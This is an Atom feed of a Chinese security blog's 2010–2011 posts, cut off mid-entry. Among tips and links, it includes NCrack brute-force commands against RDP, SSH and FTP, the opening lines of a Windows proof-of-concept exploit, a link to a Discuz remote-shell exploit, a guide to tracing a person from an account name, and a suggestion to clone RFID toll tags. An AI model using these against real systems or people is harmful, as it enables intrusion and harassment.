<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-6206663558531568736</id><updated>2011-12-29T13:21:18.339+08:00</updated><category term='sniffer嗅探'/><category term='AntiVirus'/><category term='工具網站'/><category term='JSP'/><category term='news'/><category term='Spoofing'/><category term='網路遊戲'/><category term='SQL Injection'/><category term='7-11'/><category term='xssdetect'/><category term='serv-u'/><category term='One WebServer'/><category term='McAfee'/><category term='河蟹'/><category term='人肉蒐索'/><category term='MyBB'/><category term='電子書'/><category term='put'/><category term='chrome'/><category term='webshell'/><category term='小桃'/><category term='社交工程'/><category term='Telnet'/><category term='windows 7'/><category term='firefox'/><category term='base64'/><category term='MS08067'/><category term='Flash'/><category term='tls'/><category term='OWASP'/><category term='finger print'/><category term='挑戰'/><category term='winRar'/><category term='magic_quotes_gpc'/><category term='MD5'/><category term='My programs'/><category term='ssmtp'/><category term='BIOS'/><category term='xp'/><category term='2008'/><category term='phpwind'/><category term='外掛'/><category term='asp'/><category term='XSS Shell'/><category term='MSSQL'/><category term='嗅探工具'/><category term='MSN'/><category term='MySQL'/><category term='xKungFoo'/><category term='java'/><category term='netsh'/><category term='滲透測試工具'/><category term='arachni'/><category term='NMi'/><category term='中國菜刀'/><category term='參考文獻'/><category term='crossfuzz'/><category term='antivir'/><category term='R.I.P.'/><category term='SupeV'/><category term='utf-8'/><category term='FreeBSD'/><category term='NCrack'/><category term='metasploit'/><category term='隨身碟大改造'/><category term='IIS'/><category term='pdf'/><category term='DirectShow'/><category term='唐詩'/><category term='隨語'/><category term='無線網路'/><category term='hta'/><category term='ClickJacking'/><category term='惡意程式'/><category term='lcx'/><category term='ssl'/><category term='asp.net'/><category term='pear'/><category term='柯南'/><category term='Discuz'/><category term='imail'/><category term='XSS'/><category term='exploit'/><category term='ColdFusion'/><category term='Intel'/><category term='sha1'/><category term='無腦教學'/><category term='csrf'/><category term='mail'/><category term='Anehta'/><category term='0day'/><category term='2009聽障奧運'/><category term='掛馬'/><category term='net'/><category term='Google Caneldar Sync'/><category term='RainbowCrack'/><category term='iframe'/><category term='kaspersky'/><category term='HOOK'/><category term='eTag'/><category term='crack'/><category term='2003'/><category term='大大茶樓'/><category term='Oracle'/><category term='sqlmap'/><category term='encoder'/><category term='webkit'/><category term='phpbb'/><category term='crlf'/><category term='python'/><category term='SMM'/><category term='reDuh'/><category term='rfi'/><category term='Terminal Server'/><category term='MS09-002'/><category term='PDoS'/><category term='vbs'/><category term='wargame'/><category term='技術文件'/><category term='cmd'/><category term='ipc'/><category term='bypass'/><category term='活動'/><category term='rfid'/><category term='PoC'/><category term='linux'/><category term='phpMyAdmin'/><category term='backdoor'/><category term='php'/><category term='brianfuck'/><category term='WordPress'/><category term='Outlook 2010'/><category term='Sikuli'/><category term='downloader'/><category term='windows 7 loader'/><category term='上傳漏洞'/><category term='ssh'/><category term='music'/><category term='麥當勞'/><category term='注入工具'/><category term='ddos'/><category term='wap'/><category term='TSQL'/><category term='3389'/><category term='deZender'/><category term='reDuhGUI'/><category term='Webtunnel'/><category term='magic_quotes_sybase'/><category term='fuzzy'/><category term='cpl'/><category term='好書推薦'/><category term='Tools'/><category term='DoS'/><category term='vpn'/><category term='hujack'/><category term='IE'/><category term='網頁木馬'/><category term='JBOSS'/><category term='LiveCD'/><category term='nc'/><category term='網路文章'/><category term='ShopEx'/><category term='gmail'/><category term='櫻桃小丸子'/><title type='text'>非。法。入。侵(Ver3)</title><subtitle type='html'>about  h(cr)acker's tech..
本網站原為記錄cisome在網路中所搜集到資安相關的文章，所以站上大部份的文章皆為轉貼，但由於某些原因無法得知原創作者，因此未將該文章作者附上，請見諒..</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://mycck.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><link rel='next' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default?start-index=101&amp;max-results=100'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>328</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-5018905776371198854</id><published>2011-12-29T13:21:00.001+08:00</published><updated>2011-12-29T13:21:18.369+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='sniffer嗅探'/><category scheme='http://www.blogger.com/atom/ns#' term='ssl'/><title type='text'>sslstrip awesome</title><summary type='text'>  </summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/5018905776371198854'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/5018905776371198854'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2011/12/sslstrip-awesome.html' title='sslstrip awesome'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://lh6.ggpht.com/-5o4oqFjmyiM/Tvv4yyYLVdI/AAAAAAAABsc/ggvPxiYme0k/s72-c/video18f8c13ce9cb%25255B3%25255D.jpg?imgmax=800' height='72' width='72'/></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-8857006526285902680</id><published>2011-12-29T12:00:00.001+08:00</published><updated>2011-12-29T13:03:45.782+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='好書推薦'/><title type='text'>2 Books</title><summary type='text'>The Web Application Hacker’s Handbook: Finding and Exploiting Security Flaws 2 Second Edition       Metasploit: The Penetration Tester's Guide       </summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/8857006526285902680'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/8857006526285902680'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2011/12/web-application-hackers-handbook.html' title='2 Books'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-66424837639448579</id><published>2011-10-28T14:28:00.001+08:00</published><updated>2011-10-28T14:28:46.042+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='無腦教學'/><title type='text'>PT小技巧</title><summary type='text'>很久沒更新網誌了，跟大家分享一個PT小技巧  若您的系統是win系列，而想要知道在同個網段下，有那幾個IP是沒人用的  可以嘗試下列方法：  1. ping 192.168.1.2(此為目標IP)  到這邊或許會有人反應，如果主機有防火牆設成不回應ICMP封包，那不就失敗了?  當然，如果有回應的話則代表該IP有人在使用，但沒有回應也不代表沒人使用，可能是防火牆擋住了，此時再輸入  2. arp –a  如果發現回傳訊息中存在192.168.1.2其對應的MAC，就代表該IP有機器在使用，否則沒有，你可以大大方方的用它!!!  cisome  </summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/66424837639448579'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/66424837639448579'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2011/10/pt.html' title='PT小技巧'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-1697357490034741272</id><published>2011-10-11T17:21:00.001+08:00</published><updated>2011-10-11T17:21:37.134+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='windows 7'/><category scheme='http://www.blogger.com/atom/ns#' term='antivir'/><category scheme='http://www.blogger.com/atom/ns#' term='chrome'/><title type='text'>Chrome 無回應</title><summary type='text'>如果經常發現Chrome沒有回應的問題，請先確認系統環境是否為：  Windows 7 64bit + Antivir + Chrome  如果是的話，請把 Antivir WebGuard 關閉(Disable)即可正常執行  </summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/1697357490034741272'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/1697357490034741272'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2011/10/chrome.html' title='Chrome 無回應'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-1571013293891740534</id><published>2011-08-12T12:01:00.001+08:00</published><updated>2011-08-12T12:01:39.680+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='rfid'/><category scheme='http://www.blogger.com/atom/ns#' term='eTag'/><title type='text'>有夢你會紅</title><summary type='text'>我覺得短期內想要出名的人可以去研究一下遠X電X的eT8g，雖然RFID具有傳輸很快的優點但安全性堪慮，根據我詳細的觀察eT8g應該會配套車牌辨識系統，雖然安全性提升了那一丁點，但民眾是盲目的、新聞是嗜血的，只要複製1片eT8g然後通知各大媒體，製造話題，你就是資安界的大師囉  </summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/1571013293891740534'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/1571013293891740534'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2011/08/blog-post.html' title='有夢你會紅'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-6227664749147182926</id><published>2011-06-08T11:27:00.001+08:00</published><updated>2011-06-08T11:27:28.994+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='NCrack'/><title type='text'>NCrack</title><summary type='text'>wget http://nmap.org/ncrack/dist/ncrack-0.4ALPHA.tar.gz       == 安裝 ==tar -xzf ncrack-0.4ALPHA.tar.gzcd ncrack-0.4ALPHA./configuremakesu rootmake install  == 執行 ==  1. ncrack 10.0.0.130:21  2. ncrack -v --user root localhost:22  3. ncrack -v -U windows.user -P windows.pwd 192.168.1.1:3389,CL=1 -f ref. http://nmap.org/ncrack/, http://nmap.org/ncrack/man.html  </summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/6227664749147182926'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/6227664749147182926'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2011/06/ncrack.html' title='NCrack'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-2820660107945439684</id><published>2011-04-11T15:11:00.001+08:00</published><updated>2011-04-11T15:17:51.223+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='人肉蒐索'/><category scheme='http://www.blogger.com/atom/ns#' term='無腦教學'/><title type='text'>無腦教學(一) 人肉蒐索(合法篇)</title><summary type='text'>作者：cisome  在網路上很多情況我們只能得知某個特定的資料，可能是上網的IP也可能是帳號資訊，但如果我發現一個有趣的帳號，例如：『calvinc1』，要如何找出這個人的相關資料呢?你可以簡單透過下列幾種合法管道  1.搜尋引擎(目標的粗略印象)  透過搜尋引擎可以快速的查找所有這個帳號的相關資訊，你可能在某個學校的網頁中找到這個資訊，也可能在某個論壇中發現他發表的文章，由於訊息量非常雜亂且不確定到底是不是他，或是其他使用相同帳號的仁兄，因此你除了每個連結都去逛逛外，沒有什麼特別快速辨別的方法，所以你必須在逐一瀏覽後進行簡單的分類後備用，另外，古云：狡兔有三窟，人的帳號也可能有多個，在這個階段你可以把所有的相關帳號整理後備用。  2.部落格(目標的思考邏輯)  近年來流行洩露自己的想法，部落格是最早出現做為瞭解某個人生活偶發的事件、想法、做法等思考邏輯的重要來源，除了瀏覽文章內容外，</summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/2820660107945439684'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/2820660107945439684'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2011/04/blog-post.html' title='無腦教學(一) 人肉蒐索(合法篇)'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-2576509190748814181</id><published>2011-03-23T15:03:00.001+08:00</published><updated>2011-03-23T15:03:13.138+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='arachni'/><category scheme='http://www.blogger.com/atom/ns#' term='Tools'/><title type='text'>Arachni-Web application security scanner framework</title><summary type='text'>Arachni v0.2.2.2 has just been released, you can get it from the latest page.  http://arachni.segfault.gr/news  </summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/2576509190748814181'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/2576509190748814181'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2011/03/arachni-web-application-security.html' title='Arachni-Web application security scanner framework'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-50378301754031396</id><published>2011-02-16T18:35:00.001+08:00</published><updated>2011-02-16T18:35:16.763+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Discuz'/><category scheme='http://www.blogger.com/atom/ns#' term='exploit'/><title type='text'>discuz 7.2 remote shell</title><summary type='text'>http://www.spiger.cn/article/191.html  </summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/50378301754031396'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/50378301754031396'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2011/02/discuz-72-remote-shell.html' title='discuz 7.2 remote shell'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-5721062245140818149</id><published>2011-01-12T13:50:00.001+08:00</published><updated>2011-01-12T13:50:27.977+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='技術文件'/><title type='text'>MS10-081</title><summary type='text'>http://www.breakingpointsystems.com/community/blog/microsoft-vulnerability-proof-of-concept/  </summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/5721062245140818149'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/5721062245140818149'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2011/01/ms10-081.html' title='MS10-081'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-6050300177808381470</id><published>2011-01-12T13:38:00.001+08:00</published><updated>2011-01-12T13:52:12.634+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='exploit'/><category scheme='http://www.blogger.com/atom/ns#' term='0day'/><title type='text'>windoes 0day exploit(POC)</title><summary type='text'>#!/usr/bin/env ruby   # http://breakingpointsystems.com/community/blog/microsoft-vulnerability-proof-of-concept# Nephi Johnson   require 'socket'   def http_send(sock, data, opts={})    defaults = {:code=&gt;"200", :message=&gt;"OK", :type=&gt;"text/html", :desc=&gt;"content"}    opts = defaults.merge(opts)   code = opts[:code]    message = opts[:message]    type = opts[:type]   date_str = </summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/6050300177808381470'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/6050300177808381470'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2011/01/windoes-0day-exploit.html' title='windoes 0day exploit(POC)'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-8798261788408095837</id><published>2011-01-05T13:41:00.001+08:00</published><updated>2011-01-05T13:41:16.994+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='crossfuzz'/><title type='text'>Crossfuzz</title><summary type='text'>http://lcamtuf.blogspot.com/2011/01/announcing-crossfuzz-potential-0-day-in.html  </summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/8798261788408095837'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/8798261788408095837'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2011/01/crossfuzz.html' title='Crossfuzz'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-2344621473278075711</id><published>2010-12-29T17:00:00.001+08:00</published><updated>2010-12-29T17:00:17.451+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='技術文件'/><title type='text'>The Operation Outbreak Attack (那個操作爆發攻擊) 不負責亂譯</title><summary type='text'>文中加了自己亂翻的註解及翻譯, 加減看吧      燃燒吧!我的小宇宙  The Operation Outbreak Attack   |=——————————————————————–=|    |=—————-=[ The Operation OutBreak Attack ]=—————–=|    |=————————–=[ 26 Dec 2010 ]=————————-=|    |=———————-=[ By CWH Underground ]=——————–=|    |=——————————————————————–=|  ######   Info(資訊)     ######  Title(標題) : The Operation OutBreak Attack    Author(作者) : ZeQ3uL (Prathan Phongthiproek)    </summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/2344621473278075711'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/2344621473278075711'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2010/12/operation-outbreak-attack.html' title='The Operation Outbreak Attack (那個操作爆發攻擊) 不負責亂譯'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-3324201380615501356</id><published>2010-12-29T15:04:00.001+08:00</published><updated>2010-12-29T15:04:54.687+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='deZender'/><title type='text'>顯示我的冷</title><summary type='text'>A Free Online Decoder / Decompiler WebSite  .php(zend)  .class(JAVA)  .swf(Adobe Flash)  .exe(.NET Programs)  QR Code  http://www.showmycode.com/  </summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/3324201380615501356'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/3324201380615501356'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2010/12/blog-post.html' title='顯示我的冷'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-5144210777007550541</id><published>2010-11-03T16:46:00.001+08:00</published><updated>2010-11-03T16:46:48.576+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='wargame'/><title type='text'>hack quest</title><summary type='text'>遺忘了很久的一個wargame網站  在.de的時代玩過, 但變.com後, 我的帳號資料也被清光光  有進金盾獎決賽不妨去玩看看  http://www.hackquest.com/  </summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/5144210777007550541'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/5144210777007550541'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2010/11/hack-quest.html' title='hack quest'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-1331001748773832083</id><published>2010-11-02T14:43:00.001+08:00</published><updated>2010-11-02T14:45:40.254+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='exploit'/><title type='text'>溢出資料庫</title><summary type='text'>http://www.exploit-db.com/</summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/1331001748773832083'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/1331001748773832083'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2010/11/blog-post.html' title='溢出資料庫'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-5237921831244521373</id><published>2010-10-15T10:43:00.001+08:00</published><updated>2010-10-15T10:43:46.419+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='windows 7'/><title type='text'>enable Win7 awaymode</title><summary type='text'>提供主機進入睡眠狀態時,仍保持網路連線暢通  modify register   1. 尋找HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Power  2.新增名為AwayModeEnabled的DWORD值為1  3.reboot  </summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/5237921831244521373'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/5237921831244521373'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2010/10/enable-win7-ayaymode.html' title='enable Win7 awaymode'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-4887524371620183793</id><published>2010-10-12T15:11:00.001+08:00</published><updated>2010-10-12T15:11:57.985+08:00</updated><title type='text'>轉換跑道?</title><summary type='text'>5年資安經驗, 接下來要做什麼好呢?  快把您的建議寄至 newjob.cck@gmail.com  謝謝!!  </summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/4887524371620183793'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/4887524371620183793'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2010/10/blog-post_12.html' title='轉換跑道?'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-3144877422114691382</id><published>2010-10-12T15:01:00.001+08:00</published><updated>2010-10-12T15:01:25.595+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='隨語'/><title type='text'>隔了一年的金盾獎</title><summary type='text'>去年金盾比賽僥倖獲得了第2名..  今年報名快截止了, 但好像沒什麼動力參加!!  </summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/3144877422114691382'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/3144877422114691382'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2010/10/blog-post.html' title='隔了一年的金盾獎'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-8382870944402924298</id><published>2010-08-29T08:40:00.000+08:00</published><updated>2010-08-31T00:45:36.607+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='R.I.P.'/><title type='text'>R.I.P. Prof. C.S.Laih (1956-2010)</title><summary type='text'>OCIPHLFPEMR   KLUUACRAYI    ACPRISORDP  </summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/8382870944402924298'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/8382870944402924298'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2010/08/rip-prof-cslaih-1956-2010.html' title='R.I.P. Prof. C.S.Laih (1956-2010)'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-3758672458599466994</id><published>2010-07-28T17:41:00.001+08:00</published><updated>2010-08-27T11:10:16.824+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Outlook 2010'/><category scheme='http://www.blogger.com/atom/ns#' term='Google Caneldar Sync'/><title type='text'>解決 Office Outlook 2010 與 Google Canendar Sync 同步問題</title><summary type='text'>Google Calendar Sync 是 Google Calendar 與 Office Outlook 同步的小工具, 但由於該工具並僅支援 Outlook 2003~2007 因此無法與 Outlook 2010 同步  在 Google 尚未釋出新版之前, 網路上流傳了個解決方法      就是將版本代號 14 的 outlook banner 修改成為版本代號 12 就行了  1.備份c:\program files\microsoft office\office14\outlook.exe  2.變更執行權限為可讀寫  2.使用 16 進位編輯器編輯, 並搜尋 90 28 31 34 2E  3.將 34 修改為 32 後儲存  4.你會發現 Google Canendar Sync 成功的執行同步  Google Calendar sync 0.9.3.6 已支援與 </summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/3758672458599466994'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/3758672458599466994'/><link rel='alternate' type='text/html' 